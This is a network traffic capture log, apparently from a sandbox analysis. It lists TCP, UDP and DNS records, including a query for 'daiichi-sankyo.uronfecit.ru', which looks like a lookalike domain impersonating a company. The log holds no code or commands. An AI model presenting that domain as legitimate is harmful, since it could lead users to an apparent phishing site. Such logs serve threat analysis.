                                        Jan 7, 2025 09:16:24.875931025 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.876111984 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.876152992 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.876200914 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.876246929 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.876332998 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.876390934 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.876751900 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.876807928 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.876840115 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.876888990 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.877005100 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877054930 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.877533913 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877566099 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877582073 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.877587080 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877610922 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.877785921 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877820969 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877823114 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.877830982 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877865076 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.877954960 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.877994061 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.878000021 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.878046036 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964329958 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964390039 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964400053 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964423895 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964441061 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964456081 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964523077 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964562893 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964562893 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964574099 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964597940 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964612961 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.964613914 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964622974 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.964656115 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.965115070 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965168953 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.965269089 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965313911 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.965462923 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965502977 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.965646982 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965691090 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.965822935 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965861082 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965872049 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.965878010 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965959072 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:24.965998888 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.969861031 CET49760443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:24.969877958 CET44349760104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.068110943 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.068155050 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.068217993 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.069123983 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.069140911 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.187011003 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.187335014 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.187361002 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.188500881 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.188595057 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.189866066 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.189943075 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.190166950 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.190179110 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.212644100 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.212698936 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.212799072 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.213082075 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.213097095 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.233402967 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.312701941 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.312776089 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.313039064 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.313056946 CET4434976535.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.313077927 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.313129902 CET49765443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.313569069 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.313621044 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.313694000 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.313901901 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.313914061 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.526556969 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.531534910 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.531564951 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.531968117 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.532701015 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.532769918 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.532915115 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.575346947 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.670691967 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.670789003 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.670877934 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.671654940 CET49767443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:25.671675920 CET44349767104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:25.674443960 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.678127050 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.678154945 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.678500891 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.682223082 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.682291031 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.682367086 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.723335981 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.767561913 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.803924084 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.803957939 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.804425955 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.812748909 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.812835932 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.812935114 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:25.821654081 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.821733952 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.821794987 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.821813107 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:25.821858883 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:25.837182045 CET44349737142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:16:25.837254047 CET44349737142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:16:25.837373972 CET49737443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:16:25.859334946 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.944248915 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.944323063 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:25.944426060 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:26.007229090 CET49769443192.168.2.435.190.80.1
                                        Jan 7, 2025 09:16:26.007255077 CET4434976935.190.80.1192.168.2.4
                                        Jan 7, 2025 09:16:26.007565975 CET49768443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.007599115 CET44349768104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.049741983 CET49737443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:16:26.049773932 CET44349737142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:16:26.284890890 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.284931898 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.284998894 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.285336018 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.285352945 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.735060930 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.735388994 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.735415936 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.735764027 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.736159086 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.736260891 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.736335039 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.779340029 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.833163977 CET8049723217.20.57.23192.168.2.4
                                        Jan 7, 2025 09:16:26.833300114 CET4972380192.168.2.4217.20.57.23
                                        Jan 7, 2025 09:16:26.833379984 CET4972380192.168.2.4217.20.57.23
                                        Jan 7, 2025 09:16:26.838154078 CET8049723217.20.57.23192.168.2.4
                                        Jan 7, 2025 09:16:26.882261038 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.882344007 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.882395983 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.885240078 CET49771443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:26.885276079 CET44349771104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:26.966502905 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:26.966557980 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:26.966623068 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:26.966907024 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:26.966919899 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.438939095 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.482460022 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:27.557795048 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:27.557821989 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.558382034 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.559396029 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:27.559485912 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.561279058 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:27.561327934 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:27.561397076 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:27.561784983 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:27.561796904 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:27.561948061 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:27.603334904 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.667911053 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.667990923 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.669164896 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:27.669753075 CET49772443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:27.669770002 CET44349772104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:27.671494007 CET8049740185.89.210.212192.168.2.4
                                        Jan 7, 2025 09:16:27.672863960 CET4974080192.168.2.4185.89.210.212
                                        Jan 7, 2025 09:16:27.999244928 CET4974080192.168.2.4185.89.210.212
                                        Jan 7, 2025 09:16:28.004143953 CET8049740185.89.210.212192.168.2.4
                                        Jan 7, 2025 09:16:28.025226116 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.025513887 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.025547028 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.025882006 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.026257038 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.026331902 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.026427984 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.026508093 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.026542902 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.026624918 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.026648045 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279527903 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279587030 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279617071 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279644966 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279659986 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.279695034 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279711008 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.279727936 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279757023 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279757977 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.279766083 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.279794931 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.279799938 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.280263901 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.280288935 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.280303001 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.280308008 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.280344963 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.368071079 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368174076 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368206024 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368248940 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.368279934 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368324041 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.368458033 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368587971 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368617058 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368624926 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.368628979 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368666887 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.368670940 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368730068 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.368767977 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.369492054 CET49773443192.168.2.4104.18.95.41
                                        Jan 7, 2025 09:16:28.369507074 CET44349773104.18.95.41192.168.2.4
                                        Jan 7, 2025 09:16:28.514908075 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:28.514988899 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:28.515062094 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:28.515320063 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:28.515335083 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:28.969054937 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:28.969350100 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:28.969367981 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:28.969688892 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:28.970163107 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:28.970236063 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:28.970330000 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:29.011329889 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:29.097126007 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:29.097215891 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:29.097260952 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:29.098762035 CET49774443192.168.2.4104.18.94.41
                                        Jan 7, 2025 09:16:29.098781109 CET44349774104.18.94.41192.168.2.4
                                        Jan 7, 2025 09:16:42.175903082 CET8049724217.20.57.23192.168.2.4
                                        Jan 7, 2025 09:16:42.176000118 CET4972480192.168.2.4217.20.57.23
                                        Jan 7, 2025 09:16:42.176034927 CET4972480192.168.2.4217.20.57.23
                                        Jan 7, 2025 09:16:42.180855036 CET8049724217.20.57.23192.168.2.4
                                        Jan 7, 2025 09:17:02.048158884 CET4973980192.168.2.4185.89.210.212
                                        Jan 7, 2025 09:17:02.053025961 CET8049739185.89.210.212192.168.2.4
                                        Jan 7, 2025 09:17:15.342991114 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:15.343041897 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:15.343121052 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:15.343358994 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:15.343369007 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:15.992968082 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:15.993424892 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:15.993444920 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:15.993813992 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:15.994219065 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:15.994293928 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:16.048007011 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:17.568061113 CET8049739185.89.210.212192.168.2.4
                                        Jan 7, 2025 09:17:17.568192005 CET4973980192.168.2.4185.89.210.212
                                        Jan 7, 2025 09:17:17.999552965 CET4973980192.168.2.4185.89.210.212
                                        Jan 7, 2025 09:17:18.005291939 CET8049739185.89.210.212192.168.2.4
                                        Jan 7, 2025 09:17:25.920536041 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:25.920608997 CET44349836142.250.74.196192.168.2.4
                                        Jan 7, 2025 09:17:25.920665979 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:25.985639095 CET49836443192.168.2.4142.250.74.196
                                        Jan 7, 2025 09:17:25.985666037 CET44349836142.250.74.196192.168.2.4
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 7, 2025 09:16:11.247015953 CET53548491.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:11.285618067 CET53591921.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:12.298724890 CET53620551.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:15.280468941 CET6345453192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:15.280584097 CET6038653192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:15.287319899 CET53603861.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:15.287672043 CET53634541.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:17.028575897 CET6002553192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:17.031296968 CET5746553192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:17.038086891 CET53574651.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:17.675090075 CET5723753192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:17.675407887 CET6364053192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:17.682566881 CET53636401.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:19.572618961 CET5003453192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:19.572753906 CET6030853192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:19.705059052 CET53500341.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:19.745146036 CET53603081.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.012367010 CET6242353192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.012490988 CET6243353192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.013068914 CET5527453192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.015980005 CET5043353192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.016367912 CET6107553192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.016508102 CET5388853192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.018966913 CET53624331.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.019028902 CET53624231.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.019891977 CET53552741.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.022584915 CET53504331.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.023010015 CET53610751.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.023201942 CET53538881.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.802671909 CET6198053192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.802988052 CET6360653192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.809571981 CET53619801.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.809588909 CET53636061.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.836874962 CET5116753192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.837019920 CET6096653192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:21.843411922 CET53511671.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:21.843864918 CET53609661.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:22.354929924 CET6232053192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:22.354929924 CET4952153192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:22.361409903 CET53623201.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:22.362149000 CET53495211.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:22.381177902 CET6038853192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:22.381876945 CET5692153192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:22.387878895 CET53603881.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:22.388897896 CET53569211.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:24.719201088 CET5967553192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:24.719428062 CET6134453192.168.2.41.1.1.1
                                        Jan 7, 2025 09:16:24.725871086 CET53613441.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:24.725918055 CET53596751.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:27.589534044 CET138138192.168.2.4192.168.2.255
                                        Jan 7, 2025 09:16:29.490452051 CET53554031.1.1.1192.168.2.4
                                        Jan 7, 2025 09:16:48.193025112 CET53608481.1.1.1192.168.2.4
                                        Jan 7, 2025 09:17:10.522176027 CET53554811.1.1.1192.168.2.4
                                        Jan 7, 2025 09:17:10.869080067 CET53652271.1.1.1192.168.2.4
                                        TimestampSource IPDest IPChecksumCodeType
                                        Jan 7, 2025 09:16:19.745239973 CET192.168.2.41.1.1.1c285(Port unreachable)Destination Unreachable
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 7, 2025 09:16:15.280468941 CET192.168.2.41.1.1.10x22fbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:15.280584097 CET192.168.2.41.1.1.10xc628Standard query (0)www.google.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:17.028575897 CET192.168.2.41.1.1.10xc73aStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.031296968 CET192.168.2.41.1.1.10xbe81Standard query (0)ib.adnxs.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:17.675090075 CET192.168.2.41.1.1.10x97e7Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.675407887 CET192.168.2.41.1.1.10xd7a9Standard query (0)ib.adnxs.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:19.572618961 CET192.168.2.41.1.1.10x2ee9Standard query (0)daiichi-sankyo.uronfecit.ruA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:19.572753906 CET192.168.2.41.1.1.10x93cbStandard query (0)daiichi-sankyo.uronfecit.ru65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.012367010 CET192.168.2.41.1.1.10x174eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.012490988 CET192.168.2.41.1.1.10xb31aStandard query (0)code.jquery.com65IN (0x0001)false
